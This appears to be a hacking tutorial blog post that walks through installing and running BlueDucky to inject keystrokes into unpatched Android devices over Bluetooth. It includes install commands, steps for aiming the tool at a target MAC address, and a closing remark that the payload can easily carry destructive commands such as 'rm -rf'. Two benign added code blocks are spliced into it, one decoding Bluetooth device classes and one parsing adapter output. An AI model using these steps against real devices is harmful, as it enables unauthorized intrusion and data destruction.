Bluetooth Hacking: Injecting Commands into a Bluetooth Device with BlueDucky

Welcome back, my aspiring cyberwarriors!

Bluetooth is a nearly ubiquitous protocol used to communicate between devices in close proximity or a piconet, such as speakers, headphones, and cellphones. If an attacker can exploit Bluetooth, it may be able to take control of or eavesdrop on any of these devices.

There are numerous classes of Bluetooth devices. These different classes are announced to the connecting device in the banner. In previous Bluetooth tutorials here, we have discussed probably the most important class for exploiting Bluetooth devices, the HID class. This class of device is known as a Human Interface Device and includes such things as Bluetooth mice and keyboards. These are the devices that are allowed to send input to the Bluetooth-enabled device, which is what keyboards and mice need in order to function properly.
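To make the class-of-device idea concrete, here is an added example (my own code, not from the original post or from BlueDucky) that decodes a 24-bit Bluetooth Class of Device value, such as the one bluetoothctl shows in the Class: field of its info output, and flags the Peripheral keyboard/pointing entries that HID input devices announce. The sample values are typical ones chosen for illustration, not values taken from the post.

```python
"""Decode a Bluetooth Class of Device (CoD) value and flag HID input devices.

24-bit CoD layout (Bluetooth Assigned Numbers, Baseband section):
  bits 23..13  major service classes (one flag per bit)
  bits 12..8   major device class
  bits  7..2   minor device class (meaning depends on the major class)
  bits  1..0   format type, always 0b00
"""

MAJOR_DEVICE_CLASSES = {
    0x00: "Miscellaneous", 0x01: "Computer", 0x02: "Phone",
    0x03: "LAN/Network Access Point", 0x04: "Audio/Video", 0x05: "Peripheral",
    0x06: "Imaging", 0x07: "Wearable", 0x08: "Toy", 0x09: "Health",
    0x1F: "Uncategorized",
}

SERVICE_CLASS_BITS = {
    13: "Limited Discoverable Mode", 16: "Positioning", 17: "Networking",
    18: "Rendering", 19: "Capturing", 20: "Object Transfer", 21: "Audio",
    22: "Telephony", 23: "Information",
}

# Peripheral (major 0x05): bits 7..6 say whether the device is a keyboard,
# a pointing device or both; bits 5..2 give a finer subtype.
PERIPHERAL_INPUT_TYPES = {
    0b00: None, 0b01: "Keyboard", 0b10: "Pointing device",
    0b11: "Combo keyboard/pointing device",
}
PERIPHERAL_SUBTYPES = {
    0x0: None, 0x1: "Joystick", 0x2: "Gamepad", 0x3: "Remote control",
    0x4: "Sensing device", 0x5: "Digitizer tablet", 0x6: "Card reader",
}
PHONE_MINOR_CLASSES = {
    0x0: "Uncategorized", 0x1: "Cellular", 0x2: "Cordless", 0x3: "Smartphone",
    0x4: "Wired modem or voice gateway", 0x5: "Common ISDN access",
}
PERIPHERAL_MAJOR = 0x05
PHONE_MAJOR = 0x02


def parse_cod(value):
    """Accept an int or a hex string such as '0x002540' or '0x5a020c'."""
    if isinstance(value, str):
        return int(value.strip(), 16)
    return int(value)


def decode_cod(value):
    cod = parse_cod(value)
    major = (cod >> 8) & 0x1F
    minor = (cod >> 2) & 0x3F
    result = {
        "cod": cod,
        "major": MAJOR_DEVICE_CLASSES.get(major, f"Reserved (0x{major:02x})"),
        "minor": None,
        "services": [name for bit, name in SERVICE_CLASS_BITS.items() if cod & (1 << bit)],
        "hid_input": False,
    }
    if major == PERIPHERAL_MAJOR:
        input_type = PERIPHERAL_INPUT_TYPES[(minor >> 4) & 0b11]
        subtype = PERIPHERAL_SUBTYPES.get(minor & 0xF, f"Reserved (0x{minor & 0xF:x})")
        parts = [p for p in (input_type, subtype) if p]
        result["minor"] = " / ".join(parts) if parts else "Uncategorized peripheral"
        # A device that declares keyboard or pointing capability is allowed to
        # send input events to the host once connected: the HID surface above.
        result["hid_input"] = input_type is not None
    elif major == PHONE_MAJOR:
        result["minor"] = PHONE_MINOR_CLASSES.get(minor, f"Reserved (0x{minor:x})")
    return result


def is_hid_input_device(value):
    return decode_cod(value)["hid_input"]


def describe(value):
    """One-line human-readable summary of a CoD value."""
    info = decode_cod(value)
    minor = f" ({info['minor']})" if info["minor"] else ""
    services = ", ".join(info["services"]) or "none"
    flag = "  <-- HID input device" if info["hid_input"] else ""
    return f"0x{info['cod']:06x}: {info['major']}{minor}; services: {services}{flag}"


if __name__ == "__main__":
    # Typical values chosen for illustration: keyboard, mouse, combo, Android phone, headset.
    for sample in ("0x002540", "0x002580", "0x0025c0", "0x5a020c", "0x240404"):
        print(describe(sample))
```

A defender reviewing a host's paired-device list can run each Class: value through describe() and look at what is claiming keyboard or pointing capability; the minor-class bits are what make a device an input device from the host's point of view, whatever its name says.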

In 2023, a new vulnerability was discovered in Bluetooth that may allow an unauthenticated HID device to initiate and establish an encrypted connection. If this happens, the HID device may be able to inject commands into the device. This exploit works against unpatched Android 11 and later devices and against any Android 10 and earlier device, as there is no patch presently available for those. A proof of concept (POC) was released in January 2024 and was recently integrated into a new tool known as BlueDucky.

Let’s take a look at this tool and see what it can do.

Step # 1 Download and Install BlueDucky

To install BlueDucky, we need to do a few things to get our system ready.

First, update your apt cache.

kali > sudo apt update

Next, install the necessary dependencies from the Kali repository.

kali > sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev git gcc python3-pip python3-setuptools python3-pydbus

We now need to get PyBluez (the Python Bluetooth bindings) from github.com. If you have done my previous tutorials on Bluetooth, you likely already have this.

kali >  git clone https://github.com/pybluez/pybluez.git

Now, move into the new directory, pybluez.

kali > cd pybluez

We now need to run the setup script for PyBluez.

kali > python3 setup.py install

Next, we need to build bdaddr from source. bdaddr enables us to query or set the local Bluetooth device address.

kali > cd ~

kali > git clone --depth=1 https://github.com/bluez/bluez.git

kali > gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth

Now, let's copy bdaddr to our local binary directory (/usr/local/bin) so that we can use it from anywhere, since /usr/local/bin is in the Linux $PATH variable.

kali > sudo cp bdaddr /usr/local/bin

Finally, we should download BlueDucky from github.

kali > git clone https://github.com/pentestfunctions/BlueDucky.git

kali > cd BlueDucky

kali > sudo hciconfig hci0 up

Step # 2 Run BlueDucky

Now that we have all of the elements necessary to run BlueDucky installed, let’s try running it. If you are running it from a system with an external plug-in Bluetooth adapter, as I am, you will likely need to make a small change to the Python script. BlueDucky, by default, uses hci0 to scan for Bluetooth devices. If you added an external Bluetooth adapter, it will likely be recognized as hci1. We can remedy this by simply opening the script in a text editor and changing the default value to hci1. Here I have used the default GUI text editor in Kali, mousepad.

kali > sudo mousepad BlueDucky.py

Now, go ahead and save this file. Make certain to give yourself execute permissions.

kali > sudo chmod 755 BlueDucky.py

It’s a good idea now to check to make certain your bluetooth adapter is up and activated.

kali > sudo hciconfig hci1 up
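Picking the right adapter (hci0 for the built-in radio, hci1 for a plugged-in dongle) and confirming it is actually up is the step most likely to go wrong here, so here is an added example (my own code, not from the post or from BlueDucky) that parses hciconfig output and reports each adapter's bus, address and UP/DOWN state. The sample output below is constructed with placeholder addresses; run_hciconfig() calls the real tool when you want live data.

```python
"""List Bluetooth adapters from hciconfig output and pick the one to use."""
import re
import subprocess

# Constructed sample of `hciconfig` output (placeholder addresses), mirroring the
# common case of an internal radio at hci0 and a plugged-in USB dongle at hci1.
SAMPLE_HCICONFIG = """\
hci1:\tType: Primary  Bus: USB
\tBD Address: 00:11:22:33:44:55  ACL MTU: 1021:8  SCO MTU: 64:1
\tDOWN
\tRX bytes:574 acl:0 sco:0 events:30 errors:0
\tTX bytes:368 acl:0 sco:0 commands:30 errors:0

hci0:\tType: Primary  Bus: UART
\tBD Address: AA:BB:CC:DD:EE:FF  ACL MTU: 1021:8  SCO MTU: 64:1
\tUP RUNNING PSCAN ISCAN
\tRX bytes:12345 acl:0 sco:0 events:400 errors:0
\tTX bytes:6789 acl:0 sco:0 commands:300 errors:0
"""

ADAPTER_RE = re.compile(r"^(hci\d+):\s*Type:\s*(\S+)\s+Bus:\s*(\S+)")
ADDR_RE = re.compile(r"BD Address:\s*([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})")


def parse_hciconfig(text):
    """Return one dict per adapter (name, type, bus, address, up, flags), sorted by index."""
    adapters = []
    for line in text.splitlines():
        m = ADAPTER_RE.match(line)
        if m:
            adapters.append({
                "name": m.group(1), "type": m.group(2), "bus": m.group(3),
                "address": None, "up": False, "flags": [],
            })
            continue
        if not adapters:
            continue  # ignore anything before the first adapter header
        current = adapters[-1]
        am = ADDR_RE.search(line)
        if am:
            current["address"] = am.group(1).upper()
            continue
        tokens = line.split()
        # The state line starts with UP or DOWN, followed by flags such as RUNNING, PSCAN, ISCAN.
        if tokens and tokens[0] in ("UP", "DOWN"):
            current["up"] = tokens[0] == "UP"
            current["flags"] = tokens[1:]
    return sorted(adapters, key=lambda a: int(a["name"][3:]))


def choose_adapter(adapters, prefer_bus="USB"):
    """Prefer an adapter on prefer_bus (an external dongle), else the first adapter.

    Returns (name, needs_up): needs_up tells the caller the adapter still has to
    be brought up with `sudo hciconfig <name> up` before a tool can use it.
    """
    candidates = [a for a in adapters if a["bus"] == prefer_bus] or adapters
    if not candidates:
        raise RuntimeError("no Bluetooth adapters found")
    chosen = candidates[0]
    return chosen["name"], not chosen["up"]


def run_hciconfig():
    """Call the real hciconfig (from bluez) and parse its output."""
    out = subprocess.run(["hciconfig"], capture_output=True, text=True, check=True).stdout
    return parse_hciconfig(out)


if __name__ == "__main__":
    adapters = parse_hciconfig(SAMPLE_HCICONFIG)
    for a in adapters:
        state = "UP" if a["up"] else "DOWN"
        print(f"{a['name']}: bus={a['bus']} address={a['address']} state={state} "
              f"flags={' '.join(a['flags'])}")
    name, needs_up = choose_adapter(adapters)
    print(f"use {name}" + (f" (run: sudo hciconfig {name} up first)" if needs_up else ""))
```

With the constructed sample, the script chooses hci1 (the USB dongle) and reports that it still has to be brought up, which is exactly the situation the text above describes; swapping parse_hciconfig(SAMPLE_HCICONFIG) for run_hciconfig() makes the same check against the adapters actually present on the machine.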

If your adapter is up and running, it’s time to start BlueDucky!

kali > sudo python3 BlueDucky.py

If you know the MAC address of the device, you can enter it here. If not, simply hit ENTER and BlueDucky will scan for available MAC addresses.

At this point, you can select “yes” and enter the MAC address of the target device.

When you do so, BlueDucky will run through the requisite commands to compromise the device and, if successful, will inject a “hello there 123” message into the target device.

Summary

Bluetooth-enabled devices are all around us in our everyday life. These include phones, tablets, speakers, headsets, keyboards and many other devices. Bluetooth devices declare what type of device they are before pairing with another device; this is the class of the device. This class declaration can be manipulated by an attacker to inject commands into the device.

BlueDucky is an automated tool for exploiting this vulnerability and although the tool only sends an innocuous message to the target, it can easily be altered to send malicious commands into the target device such as “shutdown” or “rm -rf”.